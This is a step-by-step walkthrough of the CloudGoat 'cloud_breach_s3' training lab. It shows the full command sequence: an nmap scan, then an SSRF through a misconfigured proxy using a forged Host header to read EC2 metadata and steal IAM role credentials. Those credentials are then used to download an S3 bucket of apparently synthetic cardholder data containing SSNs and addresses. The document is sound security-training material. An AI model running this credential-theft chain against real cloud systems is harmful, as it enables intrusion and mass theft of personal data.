CloudGoat: cloud_breach_s3 Note: We will be performing our attack via Kali Linux Ensure you have done the pre-requisites before you start the lab 1. Preparation 1.1 Launch the scenario: ┌──(root㉿kali)-[~] └─# cd /opt/cloudgoat ┌──(root㉿kali)-[/opt/cloudgoat] └─# ./cloudgoat.py create cloud_breach_s3 2. Enumerate the IP address 2.1 Nmap ┌──(root㉿kali)-[/opt/cloudgoat] └─# nmap -p- -sV 3.91.223.35 --min-rate=1000 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-09 21:22 EDT Nmap scan report for xxxx.compute-1.amazonaws.com (3.91.223.35) Host is up (0.000090s latency). Not shown: 65533 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open tcpwrapped 80/tcp open tcpwrapped Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 114.04 seconds ┌──(root㉿kali)-[/opt/cloudgoat] └─# 2.2 HTTP ┌──(root㉿kali)-[/opt/cloudgoat] └─# curl http://3.91.223.35 <h1>This server is configured to proxy requests to the EC2 metadata service. Please modify your request's 'host' header and try again.</h1> ┌──(root㉿kali)-[/opt/cloudgoat] └─# ┌──(root㉿kali)-[/opt/cloudgoat] └─# curl http://3.91.223.35 -H host:169.254.169.254 1.0 2007-01-19 2007-03-01 2007-08-29 2007-10-10 2007-12-15 2008-02-01 2008-09-01 2009-04-04 2011-01-01 2011-05-01 2012-01-12 2014-02-25 2014-11-05 2015-10-20 2016-04-19 2016-06-30 2016-09-02 2018-03-28 2018-08-17 2018-09-24 2019-10-01 2020-10-27 2021-01-03 2021-03-23 2021-07-15 2022-07-09 2022-09-24 2024-04-11 latest ┌──(root㉿kali)-[/opt/cloudgoat] └─# ┌──(root㉿kali)-[/opt/cloudgoat] └─# curl http://3.91.223.35/latest -H host:169.254.169.254 dynamic meta-data user-data ┌──(root㉿kali)-[/opt/cloudgoat] └─# ┌──(root㉿kali)-[/opt/cloudgoat] └─# curl http://3.91.223.35/latest/meta-data -H host:169.254.169.254 ami-id ami-launch-index ami-manifest-path block-device-mapping/ events/ hibernation/ hostname iam/ identity-credentials/ instance-action instance-id instance-life-cycle instance-type local-hostname local-ipv4 mac metrics/ network/ placement/ profile public-hostname public-ipv4 public-keys/ reservation-id security-groups services/ system ┌──(root㉿kali)-[/opt/cloudgoat] └─# ┌──(root㉿kali)-[/opt/cloudgoat] └─# curl http://3.91.223.35/latest/meta-data/iam -H host:169.254.169.254 info security-credentials/ ┌──(root㉿kali)-[/opt/cloudgoat] └─# ┌──(root㉿kali)-[/opt/cloudgoat] └─# curl http://3.91.223.35/latest/meta-data/iam/security-credentials -H host:169.254.169.254 cg-banking-WAF-Role-cloud_breach_s3_cgidtgnnrs1qrc ┌──(root㉿kali)-[/opt/cloudgoat] └─# ┌──(root㉿kali)-[/opt/cloudgoat] └─# curl http://3.91.223.35/latest/meta-data/iam/security-credentials/cg-banking-WAF-Role-cloud_breach_s3_cgidtgnnrs1qrc -H host:169.254.169.254 { "Code" : "Success", "LastUpdated" : "2024-05-10T01:13:54Z", "Type" : "AWS-HMAC", "AccessKeyId" : "xxxaaa", "SecretAccessKey" : "xxxbbb", "Token" : "xxxccc", "Expiration" : "2024-05-10T07:49:07Z" } ┌──(root㉿kali)-[/opt/cloudgoat] └─# 2.3 Create profile ┌──(root㉿kali)-[/opt/cloudgoat] └─# aws configure --profile s3new01 AWS Access Key ID [None]: xxxaaa AWS Secret Access Key [None]: xxxbbb Default region name [None]: Default output format [None]: ┌──(root㉿kali)-[/opt/cloudgoat] └─# ┌──(root㉿kali)-[/opt/cloudgoat] └─# mousepad ~/.aws/credentials ┌──(root㉿kali)-[/opt/cloudgoat] └─# cat ~/.aws/credentials [CloudGoat] ... ... ... [s3new01] aws_access_key_id = xxxaaa aws_secret_access_key = xxxbbb aws_session_token = xxxccc ┌──(root㉿kali)-[/opt/cloudgoat] └─# 3. Enumerate the S3 bucket 3.1 List all user owned s3 buckets ┌──(root㉿kali)-[/opt/cloudgoat] └─# aws s3 ls --profile s3new01 2024-05-09 21:13:42 cg-cardholder-data-bucket-cloud-breach-s3-cgidtgnnrs1qrc ┌──(root㉿kali)-[/opt/cloudgoat] └─# 3.2 List all prefixes and objects in a bucket ┌──(root㉿kali)-[/opt/cloudgoat] └─# aws s3 ls s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidtgnnrs1qrc --profile s3new01 2024-05-09 21:13:47 58872 cardholder_data_primary.csv 2024-05-09 21:13:48 59384 cardholder_data_secondary.csv 2024-05-09 21:13:48 92165 cardholders_corporate.csv 2024-05-09 21:13:49 249500 goat.png ┌──(root㉿kali)-[/opt/cloudgoat] └─# 3.3 Recursively copy S3 object to another location locally ┌──(root㉿kali)-[/opt/cloudgoat] └─# mkdir s3_dump ┌──(root㉿kali)-[/opt/cloudgoat] └─# aws s3 cp --recursive 's3://cg-cardholder-data-bucket-cloud-breach-s3-cgidtgnnrs1qrc' s3_dump/ --profile s3new01 download: s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidtgnnrs1qrc/cardholder_data_secondary.csv to s3_dump/cardholder_data_secondary.csv download: s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidtgnnrs1qrc/cardholder_data_primary.csv to s3_dump/cardholder_data_primary.csv download: s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidtgnnrs1qrc/cardholders_corporate.csv to s3_dump/cardholders_corporate.csv download: s3://cg-cardholder-data-bucket-cloud-breach-s3-cgidtgnnrs1qrc/goat.png to s3_dump/goat.png ┌──(root㉿kali)-[/opt/cloudgoat] └─# cd s3_dump ┌──(root㉿kali)-[/opt/cloudgoat/s3_dump] └─# ls cardholder_data_primary.csv cardholder_data_secondary.csv cardholders_corporate.csv goat.png ┌──(root㉿kali)-[/opt/cloudgoat/s3_dump] └─# cat cardholder_data_primary.csv ssn,id,first_name,last_name,email,gender,ip_address,address,city,state,zip 287-43-8531,1,Cooper,Luffman,cluffman0@nifty.com,Male,194.222.101.195,2 Killdeer Way,Atlanta,Georgia,30343 892-80-0931,2,Grata,Pulteneye,gpulteneye1@taobao.com,Female,161.4.88.129,486 Butterfield Crossing,Washington,District of Columbia,20503 502-50-6643,3,Rogerio,Glover,rglover2@nps.gov,Male,88.58.129.152,3 Granby Circle,Sacramento,California,94280 4. Clean up ┌──(root㉿kali)-[/opt/cloudgoat] └─# ./cloudgoat.py destroy cloud_breach_s3 ┌──(root㉿kali)-[/opt/cloudgoat] └─# rm -r s3_dump ┌──(root㉿kali)-[/opt/cloudgoat] └─#